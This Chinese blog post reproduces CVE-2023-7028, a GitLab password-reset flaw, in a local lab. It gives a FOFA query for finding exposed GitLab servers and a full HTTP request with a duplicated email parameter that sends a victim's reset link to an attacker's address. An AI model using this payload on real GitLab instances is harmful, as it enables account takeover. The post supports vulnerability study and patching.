漏洞复现--GitLab 任意用户密码重置漏洞(CVE-2023-7028)

最新推荐文章于 2025-03-21 16:51:09 发布
最新推荐文章于 2025-03-21 16:51:09 发布
阅读量2.8k 收藏 9
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53003652/article/details/135588919
版权
本文报道了GitLab在2023年1月11日发现的CVE-2023-7028漏洞,攻击者可通过恶意请求获取密码重置链接。官方建议升级至最新版本或限制GitLab访问地址。复现方法和受影响版本范围也做了说明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

2024年1月11日,Gitlab 官方披露 CVE-2023-7028,GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab 仅对可信地址开放。

二:漏洞影响版本

16.1 <=GitLab CE<16.1.6
16.2 <=GitLab CE<16.2.8
16.3 <=GitLab CE<16.3.6
16.4 <=GitLab CE<16.4.4
16.5 <=GitLab CE<16.5.6
16.6 <=GitLab CE<16.6.4
16.7 <=GitLab CE<16.7.2
16.1 <=GitLab EE<16.1.6
16.2 <=GitLab EE<16.2.8
16.3 <=GitLab EE<16.3.6
16.4 <=GitLab EE<16.4.4
16.5 <=GitLab EE<16.5.6
16.6 <=GitLab EE<16.6.4
16.7 <=GitLab EE<16.7.2

三:网络空间测绘查询

fofa:
app="GitLab"
image.png

四:漏洞复现

由于此漏洞利用条件为需获取系统已有用户注册邮箱地址,此次复现在本地搭建docker环境复现。
image.png
访问找回密码页面:/users/password/new,输入目标邮箱,抓包
image.png
image.png
POC:
user[email][]=mubiao@email.com&user[email][]=attacker@email.com
构造数据包,注意authenticity_token字段每次是不同的

POST /users/password HTTP/1.1
Host: 192.168.200.130:9980
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.200.130:9980
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.200.130:9980/users/password/new
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: preferred_language=zh_CN; 16.5.4-hide-alert-modal=true; known_sign_in=YlhGQWZqemF5Ri90bGh3WkZKdmQ0amtrSTVJdmtSTXRycWxQRjB3Tm1aTDczTnpmaGVLY1JPanZEdENQV3FRNmVsS3FWOG5YQzJIK2tpMytwMVV4MnZ1YlhUZFZzK2xHVVZ6TlAxWlJicjBDdmovdWpXVng1RzBYMlVtbENHV0ktLUhqYnNYM2pDM3pOdk1wN2wraGJLNVE9PQ%3D%3D--0ca69ec494c505a0cfec65e71a8c2315e444fcff; _gitlab_session=95c98f8c215016ce1c31bcd676c8c9d0
Connection: close

authenticity_token=XK1-wmJyvT2Jre1VEQ2ufEmR2GmsSju99_kJRgczjgIJArZH5yT2h44izgBfX0x0OW9VLtQbUz2yt9w--1wNag&user%5Bemail%5D=mubiao%40email.com&user%5Bemail%5D=attacker@email.com

image.png
跟随重定向
image.png
可以看到提示,如果两个邮箱都成功注册过,那么攻击者邮箱将会收到目标用户的重置密码邮件

【严重】GitLab 账号接管漏洞
murphysec的博客
01-15 935
GitLab 是由GitLab公司开发的、基于Git的集成软件开发平台。GitLab CE/EE中支持用户通过辅助电子邮件地址重置密码,默认情况允许通过未经确认电子邮件重置密码。攻击者可以利用此漏洞用户帐户密码重置电子邮件发送任意未经验证的电子邮件地址,导致用户帐户被接管。GitLab 账号接管漏洞
GitLab 密码重置漏洞(CVE-2023-7028)
kanajam的博客
07-26 595
漏洞简介GitLab 是一个用于仓库管理系统的开源项目,其使用 Git 作为代码管理工具,可通过 Web 界面访问公开或私人项目。这个正则表达式匹配的是以`&user[email]=`开头的字符串,后面跟着任意字符(非贪婪匹配),并且至少重复两次。这意味着它可以匹配包含多个`&user[email]=`的字符串。CVE-2023-7028_gitlab 任意用户密码重置漏洞复现 - FreeBuf网络安全行业门户。看到初始的包体中只有一次user的邮箱,此时构造新的邮箱加入。发送后回显302成功收到邮件。
GitLab身份绕过(CVE-2024-6678)漏洞修复方案
最新发布
AoiMukou01的博客
03-21 443
影响版本:8.14 ≤ GitLab < 17.1.7、17.2 ≤ GitLab < 17.2.5、17.3 ≤ GitLab < 17.3.2。影响版本:8.14 ≤ GitLab < 17.1.7、17.2 ≤ GitLab < 17.2.5、17.3 ≤ GitLab < 17.3.2。若当前版本不在受影响范围内或升级到修复版本,则完成修复​​​​​​​。若当前版本在受影响范围内且未升级到修复版本,则存在风险。继续重复升级,升级到不被漏洞影响的版本。已升级到Gitlab漏洞影响范围外版本。
GitLab存在任意用户密码重置漏洞CVE-2023-7028
qq_32947907的博客
01-16 1312
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。•排查gitlab-rails/production_json.log日志中是否有访问/users/password接口,且参数中包含多个邮件地址。当Gitlab启用邮箱登录、启用SMTP时,向密码重置接口发送payload,此步骤需要掌握一个已知邮箱账户。3)未开启多因素认证。
漏洞复现 | CVE-2023-7028 GitLab 任意用户密码重置
2301_80127209的博客
01-22 795
GitLab 密码重置漏洞
GitLab任意用户密码重置漏洞(CVE-2023-7028)复现
m0_64366018的博客
01-13 2912
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。
实战| 任意用户密码重置漏洞
zkaqlaoniao的博客
12-18 1293
这里只测了四位数,还是在验证没失效,其实从000000-999999 爆过去肯定就能过了【或者找个验证码字典,不过我觉得它肯定是纯数字】这里肯定是有逻辑漏洞危害的,因为密码找回我就爆破成功了。存在危害:只要logincode带着一个验证码md5加密,后面所有的登陆接口所有操作都可以无视验证码了—>这里的验证码功能等于没有,而且也没有ip访问限制,撞库就得死。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。上文拿到的手机号和对应的学号直接过了第一个验证。
CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记
weixin_43311457的博客
10-29 3289
Gitlab任意文件读取导致远程命令执行 漏洞环境搭建-Centos7 1.安装依赖软件 yum -y install policycoreutils openssh-server openssh-clients postfix 2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要) systemctl enable postfix && systemctl start postfix 3.下载gitlab安装包,然后安装 官方下载: CE
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6038
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
GitLab升级版本(任意用户密码重置漏洞CVE-2023-7028
weixin_52796198的博客
01-24 1912
最近GitLab发了个紧急漏洞需要修复,ok接到命令立刻着手开始修复,在修复之前先大概了解一下这个漏洞是什么东西。
漏洞复现-GitLab任意读取文件(CVE-2023-2825)
玄道的网安博客
08-12 1153
据悉,该漏洞影响 GitLab社区版(CE)和企业版(EE)的 16.0.0 版本,其它更早的版本几乎都不受影响。该漏洞存在于GitLab CE/EE版本16.0.0中,当嵌套在至少五个组中的公共项目中存在附件时,可在未经身份验证的情况下通过uploads功能遍历读取任意文件,导致敏感信息泄露。因此,我们需要先绕过nginx,一旦通过了校验,nginx会将未经解码处理的URL传递给Workhorse。分析nginx的代码后,不难发现在处理复杂的URI时,nginx会对URL编码的部分进行解码。
GitLab任意用户密码重置漏洞(CVE-2023-7028)
白昼小丑的博客
01-13 2186
【代码】GitLab任意用户密码重置漏洞(CVE-2023-7028)
任意密码重置漏洞
weixin_62707591的博客
06-28 1620
1. 任意密码重置漏洞原理 2. 任意密码重置漏洞产生原因 3. 任意密码重置漏洞场景 3.1 验证码爆破 3.2 验证凭证回传 3.3 验证凭证未绑是用户 3.4 跳过验证步骤 3.5 凭证可预测 3.6 同时向多个账户发送凭证 4. 任意密码重置经典案例 4.1 中国人寿某重要系统任意账户密码重置 4.2 米鼠网设计逻辑的缺陷可重置任意用户密码 5. 权限绕过漏洞 5.1 水平越权 5.2 垂直越权
任意用户密码重置漏洞挖掘
Fighter1028
11-20 1691
第一步:登录ceshi1账号找到修改密码功能抓取数据包,得知修改密码时userid参数为:23166 第二步登录测试账号2查看userid参数为21369 第三步:登录ceshi1账号找到修改密码功能抓取数据包,找到ceshi1账号下userid更为为21369 第四步:用修改后的密码登录ceshi2账号,登录成功。 ...
web渗透测试----22、业务逻辑漏洞--(2)任意用户密码重置
七天
11-05 4087
业务逻辑漏洞----任意用户密码重置
深入剖析逻辑漏洞任意密码重置任意账户登录
m0_57836225的博客
02-26 787
任意账户登录漏洞是指由于系统的逻辑错误,使得攻击者能够以任意用户的身份登录系统。逻辑漏洞的危害不容小觑,它可能导致用户信息泄露、账户被盗用等严重后果。为了防范这些漏洞,开发者在设计和开发系统时,应严格验证密码修改和登录的各种凭证,避免在前端进行关键验证,确保 token 等关键信息的随机性和不可预测性,同时定期更新系统默认口令,加强对用户安全教育,提高用户安全意识,避免使用简单、易猜测的密码。
记一次任意用户密码重置漏洞
qq_58091216的博客
11-07 634
记一次任意用户密码重置漏洞
某平台后台系统存在任意账号密码重置漏洞
李熠专用博客_白帽子一枚,人称低危终结者
11-02 1861
漏洞发现 进入该后台地址,发现有忘记密码入口 点击进入“忘记密码页面”,随手输入admin,显示出了 隐藏的手机号,需要发送验证码才能重置密码。 我的专业性告诉我,这里可能存在任意密码重置漏洞,于是尝试利用。 漏洞利用 点击“发送验证码”按钮,随便输入验证码和密码 ,此时,我并不知道验证码是多少位的,理论上,少于5位都容易被破解。于是我利用BurpSuit抓包,先尝试4位数的验证码,并且爆破。 由于成功失败返回内容长度一样,当时不知道是否爆破成功,等待片刻,输入重置的密码,发现可以登录。 漏洞危害
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值